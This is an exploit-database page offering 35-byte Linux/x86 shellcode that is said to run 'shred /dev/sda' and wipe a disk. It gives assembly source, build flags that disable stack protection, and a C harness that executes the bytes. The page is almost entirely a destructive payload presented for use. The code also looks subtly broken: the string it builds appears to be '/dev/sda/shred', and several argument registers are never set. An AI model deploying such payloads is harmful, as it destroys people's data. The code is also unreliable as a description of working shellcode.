Share
## https://sploitus.com/exploit?id=1337DAY-ID-34857
# Exploit Title: Linux/x86 - Shred /dev/sda wipe partition Shellcode (35 bytes)
# Google Dork: None
# Exploit Author: cybersaki
# Vendor Homepage: None
# Software Link: None
# Version: None
# Tested on: Kali linux 2020.2a i386 x86
# CVE : none 
# Shellcode-length : 35
# SLAE-id : Purchased | [email protected]

; Description :
; The following shellcode will execute shred /dev/sda to wipe the partitions.

; Shellcode :

section .text

global _start

_start:
  xor eax, eax
  push eax

  push word 0x6465
  push 0x7268732f
  push 0x6164732f
  push 0x7665642f

  mov ebx, esp

_exec:
  push eax
  push ebp
  push edi
  push esi
  push ebx
  mov ecx, esp
  mov al, 0xb

  int 0x80

; Compilation :
; nasm -f elf32 -o filename.o filename.nasm
; ld -z execstack -o filename filename.o
; gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

; Shellcode : 

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x73\x64\x61\x68\x2f\x64\x65\x76\x89\xe3\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}